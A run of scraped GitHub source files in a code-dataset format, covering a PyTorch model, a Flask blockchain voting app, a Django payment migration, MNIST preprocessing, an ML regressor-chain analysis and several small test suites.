hidden_channel, kernel_size= 3, stride= 2, padding = 1)\r\n conv2 = nn.Conv2d(hidden_channel, hidden_channel*2, kernel_size= 3, stride= 2, padding = 1)\r\n conv3 = nn.Conv2d(hidden_channel*2, hidden_channel*2, kernel_size= 3, stride= 2, padding = 1)\r\n lin4 = nn.Linear(hidden_channel* 2 * 4, 10)\r\n lin_contra_f = nn.Linear(hidden_channel* 2 * 4, args.contra_dim)\r\n for lin in [conv1, conv2, conv3, lin4, lin_contra_f]:\r\n nn.init.xavier_uniform_(lin.weight)\r\n nn.init.zeros_(lin.bias)\r\n self.final_cls = lin4\r\n self.contra_head = lin_contra_f\r\n self._features = nn.Sequential(conv1, nn.ReLU(True), conv2, nn.MaxPool2d(2), nn.ReLU(True), conv3, nn.Flatten())\r\n if further_cls:\r\n self.contra_cls = nn.Linear(args.contra_dim, 10)\r\n def forward(self, input_imgs, need_contra_features = False,need_contra_cls=False):\r\n features = self._features(input_imgs)\r\n if need_contra_features:\r\n features = self.contra_head(features)\r\n return features\r\n if need_contra_cls:\r\n features = self.contra_head(features)\r\n return self.contra_cls(features)\r\n out = self.final_cls(features)\r\n return out\r\n def get_features_contra(self, input):\r\n input = input.permute(0,3,1,2)\r\n features_origin = self._features(input)\r\n features = self.final_contra_cls_f(features_origin)\r\n return features\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"simpleshinobu/IRMCon","sub_path":"Biased_dataset/models/model_ours.py","file_name":"model_ours.py","file_ext":"py","file_size_in_byte":2922,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"32"} +{"seq_id":"70922488412","text":"from time import time\nimport math\nfrom functools import wraps\n\n\n# Example if we send an argument to decorator\ndef create_decorator(n):\n def decorator(func):\n @wraps(func)\n def wrapper(*args, **kwargs):\n num_error = 0\n while True:\n try: # try to run\n start = time()\n result = func(*args, **kwargs)\n print('Time:{}'.format(time() - start))\n return result\n except ValueError:\n num_error += 1 # number of errors +1\n if num_error > n: # if n times => ValueError\n raise ValueError\n\n return wrapper\n\n return decorator\n\n\n# ----------------------------------\n# TEST 1:\n@create_decorator(2)\ndef 
stupid_func(*args, **kwargs):\n print('I\\'m stupid function')\n print('And I got these *args:')\n for i in args:\n print(i, end='')\n print('')\n print('And I got these **kwargs:')\n for key in kwargs.values():\n print(key, end=' ')\n print('')\n\n\nprint('TEST_1:')\nassert stupid_func(1, [1, 2, 3], 'AAAA', first='F!') is None\nassert stupid_func.__name__ == 'stupid_func'\n\n\n# ----------------------------------\n# TEST 2:\n@create_decorator(2)\ndef stupid_ret(x):\n return x + 1\n\n\nprint('TEST_2:')\nassert stupid_ret(99) == 100\nprint('----------------------------------')\n\n\n# ----------------------------------\n# TEST 3: *args and **kwargs\n@create_decorator(2)\ndef stupid_with_kw(a, b, x=None):\n print('I got variables: ', a, b)\n return x\n\n\nprint('TEST_3:')\nassert stupid_with_kw(1, 2, x=210) == 210\nprint('----------------------------------')\n\n# ----------------------------------------\n# TEST 4: if we don't have opportunity to define function via def:\nprint('TEST_4:')\ntemp_dec = create_decorator(4)\npow_ = temp_dec(math.pow)\nassert pow_(2, 3) == 8\n","repo_name":"DmitriiDenisov/examples_for_DS","sub_path":"Decorators/examp_2.py","file_name":"examp_2.py","file_ext":"py","file_size_in_byte":1884,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"24827377214","text":"import datetime\nimport hashlib\nimport json\nfrom flask import Flask, jsonify, request\nfrom flask import Flask,jsonify\nimport requests\nfrom base64 import (\n b64encode,\n b64decode,\n)\n\nfrom Crypto.Hash import SHA256\nfrom Crypto.Signature import PKCS1_v1_5\nfrom Crypto.PublicKey import RSA\n\n\ncandidates={\"1\":'Narendra Modi',\"2\":\"Donald Trump\",\"3\":'Vladimir Vladimirovich Putin'}\nr=requests.get('http://192.168.43.54:5003/list')\nr=r.json()\n#r=requests.get('http://192.168.43.54:5003/list')\n#r=r.json()\nvoters=[]\nfor i in range(r['length']):\n block=[r['list'][i]['private_key'],r['list'][i]['name'],r['list'][i]['age'],r['list'][i]['gender'],r['list'][i]['publickey']]\n\n voters.append(block)\n\n\n\nfrom uuid import uuid4\nfrom urllib.parse import urlparse\nnode_address=str(uuid4()).replace('-','')\nclass Blockchain:\n def __init__(self):\n self.chain = []\n #self.vote=[]\n self.create_block('0','genesis',0,'0',0)\n self.nodes=set()\n\n def create_block(self,previous_hash,name,age,gender,vote):\n block = {\n \"index\": len(self.chain)+1,\n 'timestamp': str(datetime.datetime.now()),\n \"previous_hash\": previous_hash,\n \"name\":name,\n \"age\":age,\n \"gender\":gender,\n \"vote\":vote\n }\n\n self.chain.append(block)\n return block\n\n def get_previous_block(self):\n return self.chain[-1]\n\n def hash(self, block):\n encoded_block = json.dumps(block, sort_keys=True).encode()\n digest=SHA256.new()\n digest.update(encoded_block)\n return digest.hexdigest()\n\n def is_chain_valid(self, chain):\n previous_block = chain[0]\n block_index = 1\n while block_index < len(chain):\n block = chain[block_index]\n if block['previous_hash'] != self.hash(previous_block):\n return False\n return True\n\n def add_node(self,address):\n parsed_url=urlparse(address)\n self.nodes.add(parsed_url.netloc)\n\n def replace_chain(self):\n netwok=self.nodes\n longest_chain=None\n max_length=len(self.chain)\n for nodes in netwok:\n response=requests.get('http://'+node+'/get_chain')\n if response.status_code==200:\n length=response.json()['length']\n chain=response.json()['chain']\n if length > max_length and self.is_chain_valid(chain):\n max_length=length\n 
longest_chain=chain\n\n if longest_chain:\n self.chain=longest_chain\n return True\n else:\n return False\n\napp=Flask(__name__)\nblockchain=Blockchain()\n\n\n@app.route('/get_chain', methods=['GET'])\ndef get_chain():\n response = {'chain': blockchain.chain, 'length': len(blockchain.chain)}\n return jsonify(response), 200\n\n@app.route('/is_valid', methods=['GET'])\ndef is_valid():\n is_valid = blockchain.is_chain_valid(blockchain.chain)\n if is_valid:\n response = {'message': 'All good. The Blockchain is valid.'}\n else:\n response = {\n 'message':'The Blockchain is not valid.'\n }\n return jsonify(response), 200\n\n@app.route('/connect_node', methods=['POST'])\ndef connect_node():\n json=request.get_json()\n nodes=json.get('nodes')\n if nodes is None:\n return 400\n for node in nodes:\n blockchain.add_node(node)\n response={\"message\":\"all nodes connected\",\"nodes\":list(blockchain.nodes)}\n return jsonify(response),201\n\n@app.route('/replace_chain', methods=['GET'])\ndef replace_chain():\n is_chain_replaced = blockchain.replace_chain()\n if is_chain_replaced:\n response = {'message': 'chain replaced by longest','chain':blockchain.chain}\n else:\n response = {\n 'message':\n 'all good the chain is largest.'\n }\n return jsonify(response), 200\n\n@app.route('/vote', methods=['POST'])\ndef vote():\n json=request.get_json()\n previous_block = blockchain.get_previous_block()\n previous_hash = blockchain.hash(previous_block)\n candidate = request.form['candidate']\n key = request.form['key']\n name=\"\"\n age=\"\"\n gender=\"\"\n for i in voters:\n if i[0]==key:\n name=i[1]\n age=i[2]\n gender=i[3]\n\n block = blockchain.create_block(previous_hash,name,age,gender,candidate)\n block = blockchain.get_previous_block()\n hash = blockchain.hash(block)\n\n response = {'success': hash}\n return jsonify(response), 200\n\n\napp.run(host='0.0.0.0',port=5006)\n","repo_name":"Abhiyendra94/BLOCK-ELECT","sub_path":"blockchainf/vote.py","file_name":"vote.py","file_ext":"py","file_size_in_byte":4550,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"11169346060","text":"# -*- coding: utf-8 -*-\n\n\nfrom django.db import models, migrations\nimport satchmo.payment.fields\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='CreditCardDetail',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('credit_type', satchmo.payment.fields.CreditChoiceCharField(max_length=16, choices=[(b'Mastercard', 'Mastercard'), (b'Visa', 'Visa'), (b'Visa Electron', 'Visa Electron'), (b'Solo', 'Solo'), (b'JCB', 'JCB'), (b'Maestro', 'Maestro'), (b'Laser', 'Laser')])),\n ('display_cc', models.CharField(max_length=4, verbose_name='CC Number (Last 4 digits)')),\n ('encrypted_cc', models.CharField(verbose_name='Encrypted Credit Card', max_length=40, null=True, editable=False, blank=True)),\n ('expire_month', models.IntegerField(verbose_name='Expiration Month')),\n ('expire_year', models.IntegerField(verbose_name='Expiration Year')),\n ('card_holder', models.CharField(max_length=60, verbose_name='card_holder Name', blank=True)),\n ('start_month', models.IntegerField(null=True, verbose_name='Start Month', blank=True)),\n ('start_year', models.IntegerField(null=True, verbose_name='Start Year', blank=True)),\n ('issue_num', models.CharField(max_length=2, null=True, blank=True)),\n ],\n options={\n 'verbose_name': 'Credit Card',\n 
'verbose_name_plural': 'Credit Cards',\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='PaymentOption',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('description', models.CharField(max_length=20, verbose_name='Description')),\n ('active', models.BooleanField(default=True, help_text='Should this be displayed as an option for the user?', verbose_name='Active')),\n ('optionName', satchmo.payment.fields.PaymentChoiceCharField(help_text='The class name as defined in payment.py', unique=True, max_length=20, choices=[(b'PAYMENT_PAYPAL', 'PayPal'), (b'PAYMENT_WORLDPAY', 'Credit / Debit card (WorldPay)')])),\n ('sortOrder', models.IntegerField(verbose_name='Sort Order')),\n ],\n options={\n 'verbose_name': 'Payment Option',\n 'verbose_name_plural': 'Payment Options',\n },\n bases=(models.Model,),\n ),\n ]\n","repo_name":"ToeKnee/jelly-roll","sub_path":"satchmo/payment/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":2689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"71951495771","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Mar 7 17:39:33 2022\r\n\r\n@author: Fan Luo\r\n\"\"\"\r\n\"\"\"\r\n164. Maximum Gap\r\n\r\nGiven an integer array nums, return the maximum difference between two successive elements in its sorted form. \r\nIf the array contains less than two elements, return 0.\r\n\r\nYou must write an algorithm that runs in linear time and uses linear extra space.\r\n\r\nInput: nums = [3,6,9,1]\r\nOutput: 3\r\nExplanation: The sorted form of the array is [1,3,6,9], either (3,6) or (6,9) has the maximum difference 3.\r\n\"\"\"\r\n\r\nfrom collections import defaultdict\r\n\r\nclass Solution:\r\n def maximumGap(self, nums):\r\n low, high, N = min(nums), max(nums), len(nums)\r\n \r\n if N <= 2 or low == high:\r\n return high - low\r\n \r\n bucket = defaultdict(list)\r\n \r\n for n in nums:\r\n ind = N -2 if n == high else (n - low) *(N - 1) //(high - low)\r\n bucket[ind].append(n)\r\n \r\n res = [[min(bucket[i]), max(bucket[i])] for i in range(N - 1) if bucket[i]]\r\n return max(y[0] - x[1] for x, y in zip(res, res[1:]))","repo_name":"fanluo12/Leetcode_python","sub_path":"BucketSort/164_Maximum_Gap.py","file_name":"164_Maximum_Gap.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"6755970663","text":"import base64\nimport json\n\ndef handler(event, context):\n print(event[0])\n\n for payload in event:\n result = {\n \"statusCode\": 200,\n \"headers\": {\n \"content-type\": \"application/json\"\n },\n \"detail\": json.loads(base64.b64decode(payload[\"data\"]).decode(\"utf-8\"))\n\n }\n\n print(json.dumps(result))\n\n return result","repo_name":"nwoodson-ctech/core-domain","sub_path":"player/lambda_function/runtime/stream_add_player.py","file_name":"stream_add_player.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"73907021531","text":"import os\n\nfrom ..utils import Input\n\nfrom ..day_05 import part1, part2\n\nINPUT_DIRECTORY = os.path.join(\n os.path.dirname(os.path.dirname(os.path.abspath(__file__))), \"inputs\"\n)\nsource = Input(\"{}/{}\".format(INPUT_DIRECTORY, \"05.input\"), mapt=None, split=None)\n\n\ndef test_solve_part1():\n code = list(map(int, source.split(\",\")))\n 
outputs = part1(code, iter([1]))\n assert outputs[-1] == 6069343\n\n\ndef test_solve_part2():\n code = list(map(int, source.split(\",\")))\n outputs = part1(code, iter([5]))\n assert outputs[-1] == 3188550\n","repo_name":"luxcem/advent-2019","sub_path":"src/tests/test_05.py","file_name":"test_05.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25314035873","text":"import sys\nfrom pathlib import Path\n\nfrom trent.abt import sklearn_cv_data as cv_data\n\nimport numpy as np\nimport pandas as pd\n\nfrom sklearn.multioutput import RegressorChain\nfrom sklearn.linear_model import Ridge\nfrom sklearn.metrics import mean_squared_error\n\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n# paths for packages\nloader_path = Path(__file__).resolve().parents[2]\nsys.path.append(loader_path)\n\n \nclass Regressor_Chain():\n\n def __init__(\n self, srcfile: str, folds: int = 5, repeats: int = 1, seed: int = 0, l2_lambda: float = 0.001, verbose: bool=False\n ):\n \"\"\"Initialize the orchestrator.\n\n Args:\n srcfile (str): path to the ABT CSV\n folds (int): number of CV folds per repeat\n repeats (int): number of repeats, shuffling each time\n batch_size (int): eventual torch dataloader batch size\n \"\"\"\n # Load the data\n self.data = pd.read_csv(srcfile)\n self.folds = folds\n self.repeats = repeats\n self.seed = seed\n self.l2_lambda = l2_lambda\n self.verbose = verbose\n\n # create the model\n self.model = Ridge(alpha=self.l2_lambda, random_state=self.seed)\n\n # set seed\n np.random.seed(self.seed)\n\n # data loader initialisation\n self.orchestrator = orchestrator = cv_data.RepeatedStratifiedGroupKFoldOrchestrator(\n \"/Users/carl/Documents/code_repos/emer2gent-covid19/data/model_abt.csv\", # TODO: need to update for final ABT location\n repeats=self.repeats,\n folds=self.folds,\n )\n self.features, self.num_features = cv_data.abt_info()\n\n\n\n # run model for data above:\n def execute(self):\n\n health_first_repeat_dict = {}\n econ_first_repeat_dict = {}\n for i, repeat in enumerate(self.orchestrator): # each repetition of cv\n health_first_fold_dict = {}\n econ_first_fold_dict = {}\n for k, (tr, te) in enumerate(repeat): # each fold within a cv iteration\n \n X_train = tr[0][0]\n y_train = tr[0][1]\n z_train = tr[0][2]\n\n X_val = te[0][0]\n y_val = te[0][1]\n z_val = te[0][2]\n\n run_iter = f'rpt_{i}_fold_{k}'\n # path to save checkpoints to\n\n # econ model adjusted for health model\n r_chain_1 = RegressorChain(\n self.model, \n order=[0,1],\n cv=5,\n random_state=self.seed\n )\n\n r_chain_1.fit(X_train, y_train)\n y_pred = r_chain_1.predict(X_val)\n score_1 = mean_squared_error(y_val, y_pred, sample_weight=z_val)\n models = r_chain_1.estimators_\n health_model_1 = models[0]\n econ_model_1 = models[1]\n \n\n # econ model adjusted for health model\n r_chain_2 = RegressorChain(\n self.model, \n order=[1,0],\n cv=5,\n random_state=self.seed\n )\n r_chain_2.fit(X_train, y_train)\n y_pred = r_chain_2.predict(X_val)\n score_2 = mean_squared_error(y_val, y_pred, sample_weight=z_val)\n models = r_chain_2.estimators_\n health_model_2 = models[1]\n econ_model_2 = models[0]\n\n if self.verbose: print(f'Repeat: {i}, Fold: {k}, Validation Results: Model_1: {score_1}, Model_2: {score_2}')\n \n health_first_fold_dict[k] = [health_model_1.coef_, econ_model_1.coef_]\n econ_first_fold_dict[k] = [health_model_2.coef_, econ_model_2.coef_]\n\n \n health_first_repeat_dict[i] = 
health_first_fold_dict\n econ_first_repeat_dict[i] = econ_first_fold_dict\n\n return health_first_repeat_dict, econ_first_repeat_dict\n\n def graph_builder(\n self, \n health_first_repeat_dict, \n econ_first_repeat_dict, \n height: float=1.25, \n aspect: float=8, \n low_lim: float=-5, \n high_lim: float=10,\n plot=1,\n save=False\n ):\n\n run = [f'Run {i}' for i in range(self.repeats*self.folds)]\n\n # MODEL 1:\n if plot == 1 or plot == 2:\n # select the health first model and format the coeffs for use in graphs\n health_first_coeffs = [health_first_repeat_dict[i][j] for i in range(self.repeats) for j in range(self.folds)]\n health_coeffs_1 = np.array([item[0] for item in health_first_coeffs])\n econ_coeffs_1 = np.array([item[1] for item in health_first_coeffs])\n econ_coeffs_1 = econ_coeffs_1[:,:self.num_features] # want only the feature coefficients, ignores the other target dependent coeff \n \n # create dataframe of all model runs and select the order based on median\n health_df_1 = pd.DataFrame(health_coeffs_1, index=run, columns=self.features)\n health_order_1 = health_df_1.describe().loc['50%',:].sort_values(ascending=False).index.tolist()\n econ_df_1 = pd.DataFrame(econ_coeffs_1, index=run, columns=self.features)\n econ_order_1 = econ_df_1.describe().loc['50%',:].sort_values(ascending=False).index.tolist()\n\n # reshape dataframes for plotting distribution graphs\n health_df_1 = pd.melt(health_df_1, value_vars=self.features, var_name='feature', value_name='coeff_value')\n econ_df_1 = pd.melt(econ_df_1, value_vars=self.features, var_name='feature', value_name='coeff_value')\n\n if plot == 1:\n # create graphs for model_1\n g_health_1 = sns.FacetGrid(health_df_1, row=\"feature\", row_order=health_order_1,\n height=height, aspect=aspect, xlim=(low_lim, high_lim))\n g_health_1.map(sns.distplot, 'coeff_value', rug=True, hist=False, color=\"grey\", kde_kws={\"shade\": True})\n\n plt.subplots_adjust(top=0.95)\n g_health_1.fig.suptitle('Health Feature Coefficients, Economic dependent on Health Output') \n\n if save: plt.savefig('/Users/carl/Documents/code_repos/emer2gent-covid19/data/result_graphs/health_1.png')\n\n plt.show()\n \n elif plot == 2:\n g_econ_1 = sns.FacetGrid(econ_df_1, row=\"feature\", row_order=econ_order_1,\n height=height, aspect=aspect, xlim=(low_lim, high_lim))\n g_econ_1.map(sns.distplot, 'coeff_value', rug=True, hist=False, color=\"grey\", kde_kws={\"shade\": True})\n\n plt.subplots_adjust(top=0.95)\n g_econ_1.fig.suptitle('Economic Feature Coefficients, Economic dependent on Health Output') \n\n if save: plt.savefig('/Users/carl/Documents/code_repos/emer2gent-covid19/data/result_graphs/econ_1.png')\n\n plt.show()\n\n\n # MODEL 2:\n elif plot == 3 or plot == 4:\n\n # select the health first model and format the coeffs for use in graphs\n econ_first_coeffs = [econ_first_repeat_dict[i][j] for i in range(self.repeats) for j in range(self.folds)]\n health_coeffs_2 = np.array([item[0] for item in econ_first_coeffs])\n health_coeffs_2 = health_coeffs_2[:,:self.num_features] # want only the feature coefficients, ignores the other target dependent coeff \n econ_coeffs_2 = np.array([item[1] for item in econ_first_coeffs])\n\n\n # create dataframe of all model runs and select the order based on median\n health_df_2 = pd.DataFrame(health_coeffs_2, index=run, columns=self.features)\n health_order_2 = health_df_2.describe().loc['50%',:].sort_values(ascending=False).index.tolist()\n econ_df_2 = pd.DataFrame(econ_coeffs_2, index=run, columns=self.features)\n econ_order_2 = 
econ_df_2.describe().loc['50%',:].sort_values(ascending=False).index.tolist()\n\n # reshape dataframes for plotting distribution graphs\n health_df_2 = pd.melt(health_df_2, value_vars=self.features, var_name='feature', value_name='coeff_value')\n econ_df_2 = pd.melt(econ_df_2, value_vars=self.features, var_name='feature', value_name='coeff_value')\n\n # create graphs for model_1\n\n if plot == 3:\n g_health_2 = sns.FacetGrid(health_df_2, row=\"feature\", row_order=health_order_2,\n height=height, aspect=aspect, xlim=(low_lim, high_lim))\n g_health_2.map(sns.distplot, 'coeff_value', rug=True, hist=False, color=\"grey\", kde_kws={\"shade\": True})\n\n plt.subplots_adjust(top=0.95)\n g_health_2.fig.suptitle('Health Feature Coefficients, Health dependent on Economic Output') \n\n if save: plt.savefig('/Users/carl/Documents/code_repos/emer2gent-covid19/data/result_graphs/health_2.png')\n\n plt.show()\n\n elif plot == 4:\n g_econ_2 = sns.FacetGrid(econ_df_2, row=\"feature\", row_order=econ_order_2,\n height=height, aspect=aspect, xlim=(low_lim, high_lim))\n g_econ_2.map(sns.distplot, 'coeff_value', rug=True, hist=False, color=\"grey\", kde_kws={\"shade\": True})\n\n plt.subplots_adjust(top=0.95)\n g_econ_2.fig.suptitle('Economic Feature Coefficients, Health dependent on Economic Output') \n\n if save: plt.savefig('/Users/carl/Documents/code_repos/emer2gent-covid19/data/result_graphs/econ_2.png')\n\n plt.show()\n\n\n else: print('Plot chosen not available')\n \n\n\nif __name__ == \"__main__\":\n execute()\n","repo_name":"ElderResearch/emer2gent-covid19","sub_path":"src/python/pkg/trent/models/regressor_chain.py","file_name":"regressor_chain.py","file_ext":"py","file_size_in_byte":10675,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"} +{"seq_id":"1674447679","text":"import csv\nimport random\nimport os\n\n\n# loads data and returns it in 2 lists- data and labels\ndef load_raw_data(path, limit = 1000000):\n\n train_raw = []\n with open(path, 'r') as csv_file:\n csv_reader = csv.reader(csv_file)\n i = 0\n for line in csv_reader:\n if line:\n i +=1\n train_raw.append(line)\n if i >= limit:\n break\n\n train_targets = []\n for each in train_raw:\n if each:\n label = each.pop(0)\n train_targets.append(label)\n return train_raw, train_targets\n\n\n# returns normalized data\ndef normalize_raw_data(raw):\n new_data = []\n for each in raw:\n if each:\n new_data.append([int(x)/255 for x in each])\n return new_data\n\n\n# returns data as list of 10 elements\ndef normalize_target_data(raw):\n new_data = []\n for each in raw:\n if each:\n normalized = [0 for x in range(10)]\n normalized[int(each)] = 1\n new_data.append(normalized)\n return new_data\n\n\ndef save_normalized_train_data(normal_train_data, new_file_name):\n with open(new_file_name, 'w', newline='') as newfile:\n csv_writer = csv.writer(newfile)\n for each in normal_train_data:\n if each:\n csv_writer.writerow(each)\n\n\ndef save_normalized_labels_data(normal_train_labels, new_file_name):\n with open(new_file_name, 'w', newline='') as newfile:\n csv_writer = csv.writer(newfile)\n for each in normal_train_labels:\n if each:\n csv_writer.writerow(each)\n\n\n# downloads data, shuffles it, saves it again\ndef shuffle(data_file, labels_file):\n data = []\n labels = []\n seed = random.random()\n with open(data_file, 'r') as file:\n csv_reader = csv.reader(file)\n i = 0\n for line in csv_reader:\n data.append(line)\n i += 1\n if i >= 60000:\n break\n\n print('downloaded...', end=' ')\n random.seed(seed)\n 
random.shuffle(data)\n os.remove(data_file)\n\n print('shuffled...', end=' ')\n with open(data_file, 'w', newline='') as file:\n writer = csv.writer(file)\n for line in data:\n writer.writerow(line)\n data = []\n print('saved')\n\n with open(labels_file, 'r') as file:\n csv_reader = csv.reader(file)\n i = 0\n for line in csv_reader:\n labels.append(line)\n i += 1\n if i >= 60000:\n break\n print('downloaded...', end=' ')\n random.seed(seed)\n random.shuffle(labels)\n os.remove(labels_file)\n print('shuffled...', end=' ')\n\n with open(labels_file, 'w', newline='') as file:\n writer = csv.writer(file)\n for line in labels:\n writer.writerow(line)\n labels = []\n print('saved')\n\n# script to save normalized data\n\n'''\nif __name__ == \"__main__\":\n\n\n raw_train_data, raw_train_labels = load_raw_data('mnist_train.csv')\n\n train_data = normalize_raw_data(raw_train_data)\n train_labels = normalize_target_data(raw_train_labels)\n save_normalized_train_data(train_data, 'training_data.csv')\n save_normalized_labels_data(train_labels, 'training_labels.csv')\n\nraw_test_data, raw_test_labels = load_raw_data('mnist_test.csv')\n\ntest_data = normalize_raw_data(raw_test_data)\ntest_labels = normalize_target_data(raw_test_labels)\n\nsave_normalized_train_data(test_data, 'test_data.csv')\nsave_normalized_labels_data(test_labels, 'test_labels.csv')\n\n\n\ndata, labels = load_raw_data('mnist_train.csv', 1000)\nnormal_data = normalize_raw_data(data)\nnormal_labels = normalize_target_data(labels)\nsave_normalized_train_data(normal_data, 'test_data.csv')\nsave_normalized_labels_data(normal_labels, 'test_labels.csv')\n'''\n","repo_name":"borisengler/Neural-Network","sub_path":"Data_managment.py","file_name":"Data_managment.py","file_ext":"py","file_size_in_byte":3776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25066717271","text":"import numpy,matplotlib\nimport matplotlib.pyplot as plt\n\ndef render(x,w,h,vmax=0.1):\n x = x.reshape([h,w,62,47])\n z = numpy.ones([h,w,64,49])*vmax\n z[:,:,1:-1,1:-1] = x\n x = z.reshape([h,w,64,49]).transpose([0,2,1,3]).reshape([h*64,w*49])\n plt.figure(figsize=(0.49*2*w,0.64*2*h))\n plt.imshow(x,cmap=plt.cm.gray,vmin=-vmax,vmax=vmax)\n plt.axis('off')\n plt.show()\n\ndef scatterplot(x,y,xlabel='',ylabel=''):\n plt.figure(figsize=(3,3))\n plt.xlabel(xlabel)\n plt.ylabel(ylabel)\n plt.plot(x,y,'.')\n plt.show()\n\n","repo_name":"moritz-gerster/machine_learning1","sub_path":"Week03_Principal-Component-Analysis/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"10983472526","text":"#!/usr/bin/env pytest -vs\n\"\"\"Tests for NotePage objects in pws-api-wrapper.\"\"\"\n\n# Third-Party Libraries\nimport pytest\nfrom schema import SchemaError\nimport vcr\n\n# Custom Libraries\nfrom pws_api_wrapper import NotePage\n\n\nclass TestNotePage:\n \"\"\"Tests for the NotePage.\"\"\"\n\n @vcr.use_cassette(\"tests/vcr_cassettes/notePage/create-200.yml\")\n def test_create_200(self, notePage_dict):\n \"\"\"Test an API call to create a Note Page.\"\"\"\n # Delete id as teh API will not accept when creating.\n del notePage_dict[\"id\"]\n\n notePage = NotePage(**notePage_dict)\n\n message = notePage.create()\n\n # Add note page ID back to notePage_dict\n notePage_dict[\"id\"] = notePage.id\n\n assert isinstance(notePage, NotePage)\n assert notePage.to_dict() == notePage_dict\n assert message == 
\"Note Page Engagement Test Note (1ab5Mqoy) created.\"\n\n @vcr.use_cassette(\"tests/vcr_cassettes/notePage/create-400.yml\")\n def test_create_400(self, notePage_dict):\n \"\"\"Test an API call to fail at creating a Note Page.\"\"\"\n # Add a fake engagement id to cause an error.\n notePage_dict[\"oid\"] = \"12345678\"\n\n notePage = NotePage(**notePage_dict)\n\n message = notePage.create()\n\n assert isinstance(notePage, NotePage)\n assert message == \"Error: Invalid engagements ID\"\n\n @vcr.use_cassette(\"tests/vcr_cassettes/notePage/delete-200.yml\")\n def test_delete_200(self, notePage_dict):\n \"\"\"Test an API call to delete a Note Page.\"\"\"\n notePage = NotePage(**notePage_dict)\n\n message = notePage.delete()\n\n assert message == \"Note Page Engagement Test Note (1ab5Mqoy) deleted.\"\n\n @vcr.use_cassette(\"tests/vcr_cassettes/notePage/delete-400.yml\")\n def test_delete_400(self, notePage_dict):\n \"\"\"Test an API call to delete a Note Page that is note found.\"\"\"\n notePage_dict[\"id\"] = \"abcd1234\"\n\n notePage = NotePage(**notePage_dict)\n\n message = notePage.delete()\n\n assert message == \"Error: Note Page Engagement Test Note (abcd1234) not found.\"\n\n @vcr.use_cassette(\"tests/vcr_cassettes/notePage/get-200.yml\")\n def test_get_200(self, notePage_dict):\n \"\"\"Test an API call to getting a Note Page.\"\"\"\n notepad = NotePage.get(\"1ab5Mqoy\")\n\n assert isinstance(notepad, NotePage)\n assert notepad.to_dict() == notePage_dict\n\n @vcr.use_cassette(\"tests/vcr_cassettes/notePage/get-400.yml\")\n def test_get_400(self, notePage_dict):\n \"\"\"Test an API call to fail at getting a Note Page.\"\"\"\n with pytest.raises(SystemExit):\n NotePage.get(\"abcd1234\")\n\n def test_init_validation_pass(self, notePage_dict):\n \"\"\"Test the init validation.\"\"\"\n notePage = NotePage(**notePage_dict)\n\n assert notePage.to_dict() == notePage_dict\n\n @pytest.mark.parametrize(\n \"attribute,value,error_message\",\n [\n (\"id\", 4, '\"id\" should be 8 alphanumeric characters'),\n (\"id\", \"asd123\", '\"id\" should be 8 alphanumeric characters'),\n (\"id\", \"abcd123!\", '\"id\" should be 8 alphanumeric characters'),\n (\"oid\", 4, '\"oid\" should be 8 alphanumeric characters'),\n (\"oid\", \"asd123\", '\"oid\" should be 8 alphanumeric characters'),\n (\n \"oid\",\n \"abcd123!\",\n '\"oid\" should be 8 alphanumeric characters',\n ),\n (\"title\", \"\", 'Note Page \"title\" is required.'),\n (\"content\", 1, '\"contented\" should be a string or None.'),\n (\n \"otype\",\n \"green\",\n '\"otype\" should be one of the following:',\n ),\n ],\n )\n def test_init_validation_fail(self, attribute, value, error_message, notePage_dict):\n \"\"\"Test the init validation fails when string value are not strings.\"\"\"\n notePage_dict[attribute] = value\n with pytest.raises(SchemaError, match=error_message):\n NotePage(**notePage_dict)\n\n @vcr.use_cassette(\"tests/vcr_cassettes/notePage/update-200.yml\")\n def test_update_200(self, notePage_dict):\n \"\"\"Test an API call to put an update to a NotePad.\"\"\"\n notePage_dict[\"content\"] = \"New Content\"\n\n notePage = NotePage(**notePage_dict)\n\n message = notePage.update()\n\n assert isinstance(notePage, NotePage)\n assert notePage.to_dict() == notePage_dict\n assert message == \"Note Page Engagement Test Note (1ab5Mqoy) updated.\"\n\n @vcr.use_cassette(\"tests/vcr_cassettes/notePage/update-400.yml\")\n def test_update_400(self, notePage_dict):\n \"\"\"Test an API call to update a Note Page with missing object.\"\"\"\n 
